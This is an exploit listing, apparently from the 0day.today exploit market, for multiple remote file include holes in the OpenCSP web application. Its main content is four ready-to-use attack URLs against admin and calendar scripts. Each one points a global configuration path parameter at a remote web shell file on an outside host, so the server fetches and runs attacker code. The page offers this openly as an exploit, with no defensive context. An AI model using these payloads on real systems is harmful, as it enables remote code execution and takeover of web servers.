[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

OpenCSP Multiple Remote File Include Vulnerability

Author
EANgel
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10018
Category
web applications
Date add
25-11-2009
Platform
unsorted
==================================================
OpenCSP Multiple Remote File Include Vulnerability
==================================================


[@]================================================================================================================================================[@]
                          
[+] Location         : notepad                                            
[+] Download Script  : http://sourceforge.net/projects/opencsp/                    
[@]================================================================================================================================================[@]
 
 
 
[@]================================================================================================================================================[@]
[+] 3xpl0it      : http://server/htsystem/admin/client/newClient.php?GLOBALS[OCSP][DEFAULTCONFPATH]=http://example.com/webshell.txt?
[+]                        http://server/htsystem/admin/modules/galerie/index.php?GLOBALS[OCSP][DEFAULTCONFPATH]=http://example.com/webshell.txt?
[+]                        http://server/htsystem/system/calendar.php?GLOBALS[PROJECT][PHPINCPATH]=http://example.com/webshell.txt?
[+]                        http://server/htsystem/system/forms/calendar.php?GLOBALS[PROJECT][PHPINCPATH]=http://example.com/webshell.txt?
[@]================================================================================================================================================[@]



#  0day.today [2024-12-24]  #